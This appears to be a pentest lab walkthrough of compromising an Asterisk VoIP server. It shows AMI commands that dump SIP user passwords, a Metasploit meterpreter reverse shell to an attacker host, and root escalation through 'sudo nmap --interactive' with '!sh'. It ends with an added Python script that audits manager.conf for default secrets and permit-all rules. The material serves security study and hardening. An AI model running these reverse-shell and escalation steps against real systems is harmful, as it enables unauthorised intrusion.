manager /etc/asterisk/manager.conf
manager /etc/asterisk/manager_additional.conf
manager /etc/asterisk/manager_custom.conf
app_meetme /etc/asterisk/meetme.conf
app_meetme /etc/asterisk/meetme_additional.conf
core /etc/asterisk/modules.conf
res_musiconhold /etc/asterisk/musiconhold.conf
res_musiconhold /etc/asterisk/musiconhold_additional.conf
res_musiconhold /etc/asterisk/musiconhold_custom.conf
chan_phone /etc/asterisk/phone.conf
app_queue /etc/asterisk/queues.conf
app_queue /etc/asterisk/queues_additional.conf
app_queue /etc/asterisk/queues_custom.conf
app_queue /etc/asterisk/queues_custom_general.conf
app_queue /etc/asterisk/queues_general_additional.conf
app_queue /etc/asterisk/queues_post_custom.conf
rtp /etc/asterisk/rtp.conf
chan_sip /etc/asterisk/sip.conf
res_phoneprov /etc/asterisk/sip.conf
chan_sip /etc/asterisk/sip_additional.conf
res_phoneprov /etc/asterisk/sip_additional.conf
chan_sip /etc/asterisk/sip_custom.conf
res_phoneprov /etc/asterisk/sip_custom.conf
chan_sip /etc/asterisk/sip_custom_post.conf
res_phoneprov /etc/asterisk/sip_custom_post.conf
chan_sip /etc/asterisk/sip_general_additional.conf
res_phoneprov /etc/asterisk/sip_general_additional.conf
chan_sip /etc/asterisk/sip_general_custom.conf
res_phoneprov /etc/asterisk/sip_general_custom.conf
chan_sip /etc/asterisk/sip_nat.conf
res_phoneprov /etc/asterisk/sip_nat.conf
chan_sip /etc/asterisk/sip_registrations.conf
res_phoneprov /etc/asterisk/sip_registrations.conf
chan_sip /etc/asterisk/sip_registrations_custom.conf
res_phoneprov /etc/asterisk/sip_registrations_custom.conf
app_voicemail /etc/asterisk/vm_email.inc
app_voicemail /etc/asterisk/vm_general.inc
app_voicemail /etc/asterisk/voicemail.conf
Example 2 of the commands above:
action: command
command: sip show users
Response: Follows
Privilege: Command
Username Secret Accountcode Def.Context ACL NAT
100 from-internal Yes Always
101 s3cur3 from-internal Yes Always
102 letmein123 from-internal Yes Always
201 secret123 from-internal Yes Always
200 quit3s3curE123 from-internal Yes Always
2000 password123 from-internal Yes Always
exploit-method
Username: support
Password: securesupport123
http://192.168.108.196/admin/modules/
msf exploit(handler) > set LHOST 192.168.108.113
LHOST => 192.168.108.113
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
DebugOptions 0 no Debugging options for POSIX meterpreter
LHOST 192.168.108.113 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse handler on 192.168.108.113:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to 192.168.108.196
[*] Meterpreter session 1 opened (192.168.108.113:4444 -> 192.168.108.196:51358) at 2015-02-09 04:52:05 +0000
meterpreter > shell
Process 14996 created.
Channel 1 created.
sh: no job control in this shell
sh-3.2$ id
uid=101(asterisk) gid=103(asterisk) groups=103(asterisk)
sh-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
Runas and Command-specific defaults for asterisk:
User asterisk may run the following commands on this host:
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /usr/bin/nmap
sh-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap-path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap-path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
nmap> !sh
sh: no job control in this shell
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2#
Set up an environment
platform: Linux gnu 3.12-kali1-686-pae #1 SMP Debian 3.12.6-2kali1 (2014-01-06) i686 GNU/Linux
root@gnu:/etc/asterisk# apt-get install asterisk
root@gnu:/etc/asterisk/manager.d# cat README.conf
; please read the documentation regarding the Manager Interface (asterisk-doc package)
[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,originate
write = system,call,log,verbose,command,agent,user,originate
; read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
; write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
root@gnu:/etc/asterisk/manager.d# service asterisk start
Starting Asterisk PBX: asterisk.
root@gnu:/etc/asterisk# ncat -v 127.0.0.1 5038
Ncat: Version 6.46 ( http://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111
Response: Success
Message: Authentication accepted
Event: FullyBooted
Privilege: system,all
Status: Fully Booted
action: command
command: sip show users
Response: Follows
Privilege: Command
Username Secret Accountcode Def.Context ACL ForcerPort
--END COMMAND--
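The AMI login earlier in this write-up, and the README.conf stanza just above, succeed for the same three reasons: a known default secret (amp111), permit=0.0.0.0/0.0.0.0 with no deny baseline, and the command privilege, which lets an AMI user run Asterisk CLI commands (including the CLI's ! shell escape shown in the help listing). As an added example, not from the write-up and not Asterisk code, the script below parses a manager.conf fragment and flags those conditions, with a constructed hardened stanza beside the vulnerable one. The 12-character minimum and the placeholder secret value are assumptions of the example, not Asterisk defaults.

```python
# Added example: audit Asterisk manager.conf stanzas for the weaknesses the
# write-up exercises (default secret, permit-all ACL, 'command' privilege).
# Not code from the write-up or from the Asterisk project.
import ipaddress
from typing import Dict, List, Tuple

# Constructed sample: the [admin] stanza from the Debian README.conf quoted above.
SAMPLE_MANAGER_CONF = """\
; please read the documentation regarding the Manager Interface (asterisk-doc package)
[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,originate
write = system,call,log,verbose,command,agent,user,originate
"""

# Constructed hardened counterpart: default-deny, loopback only, read-only, least privilege.
HARDENED_MANAGER_CONF = """\
[monitor]
secret = REPLACE_WITH_LONG_RANDOM_SECRET   ; placeholder value, not a real secret
deny = 0.0.0.0/0.0.0.0
permit = 127.0.0.1/255.255.255.255
read = call,cdr
write =
"""

KNOWN_DEFAULT_SECRETS = {"amp111"}          # the default the write-up logs in with
DANGEROUS_PRIVILEGES = {"command", "all"}   # 'command' = arbitrary CLI commands
MIN_SECRET_LEN = 12                         # assumed local policy, not an Asterisk value

Section = List[Tuple[str, str]]


def parse_asterisk_conf(text: str) -> Dict[str, Section]:
    """Minimal parser for Asterisk's ini-style files: [section] headers,
    key=value or key=>value, ';' comments. Repeated keys (deny/permit) keep order."""
    sections: Dict[str, Section] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
            continue
        if current is None:
            raise ValueError(f"key outside any section: {line!r}")
        key, _, value = line.partition("=>") if "=>" in line else line.partition("=")
        sections[current].append((key.strip(), value.strip()))
    return sections


def _is_catch_all(addr: str) -> bool:
    """True for 0.0.0.0/0.0.0.0 or 0.0.0.0/0 (Asterisk accepts netmask or prefix form)."""
    return ipaddress.ip_network(addr, strict=False).prefixlen == 0


def audit_manager_user(entries: Section) -> List[str]:
    """Return a list of findings for one manager user stanza (empty = nothing flagged)."""
    findings: List[str] = []
    secret = ""
    denies, permits, privileges = [], [], set()
    for key, value in entries:
        if key == "secret":
            secret = value
        elif key == "deny" and value:      # 'deny=' with no value denies nothing
            denies.append(value)
        elif key == "permit" and value:
            permits.append(value)
        elif key in ("read", "write"):
            privileges.update(p.strip() for p in value.split(",") if p.strip())
    if not secret:
        findings.append("empty secret")
    elif secret in KNOWN_DEFAULT_SECRETS:
        findings.append(f"default secret {secret!r}")
    elif len(secret) < MIN_SECRET_LEN:
        findings.append("secret shorter than policy minimum")
    if not any(_is_catch_all(d) for d in denies):
        findings.append("no deny=0.0.0.0/0.0.0.0 baseline before permit rules")
    for p in permits:
        if _is_catch_all(p):
            findings.append(f"permit={p} accepts logins from any source address")
    for priv in sorted(privileges & DANGEROUS_PRIVILEGES):
        findings.append(f"privilege {priv!r} allows CLI commands (incl. the '!' shell escape)")
    return findings


def audit_manager_conf(text: str) -> Dict[str, List[str]]:
    """Audit every user stanza; [general] holds listener settings, not a user."""
    return {name: audit_manager_user(entries)
            for name, entries in parse_asterisk_conf(text).items() if name != "general"}


if __name__ == "__main__":
    for label, conf in (("vulnerable", SAMPLE_MANAGER_CONF), ("hardened", HARDENED_MANAGER_CONF)):
        for user, findings in audit_manager_conf(conf).items():
            print(f"[{label}] {user}: {findings or 'no findings'}")
```

Pointing audit_manager_conf() at the contents of /etc/asterisk/manager.conf (and the manager_*.conf files listed by config list above) gives a quick check that no AMI user is reachable from anywhere with a default secret and command rights; the AMI listener itself should additionally be bound to localhost or firewalled, which this script does not check.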
References
[1] http://www.rebootuser.com/?p=1117
[2] https://resources.enablesecurity.com/resources/Storming%20SIP%20Security%20Captions.pdf
[3] http://chousensha.github.io/blog/2014/10/07/pentest-lab-vulnvoip/
[4] http://www.freepbx.org/support/documentation/administration-guide/asterisk-cli-commands
[5] http://www.xtelsio.com/hlp/en/ast/ast/asterisk_manager.htm
[6] https://github.com/fozavci/viproy-voipkit
[7] http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP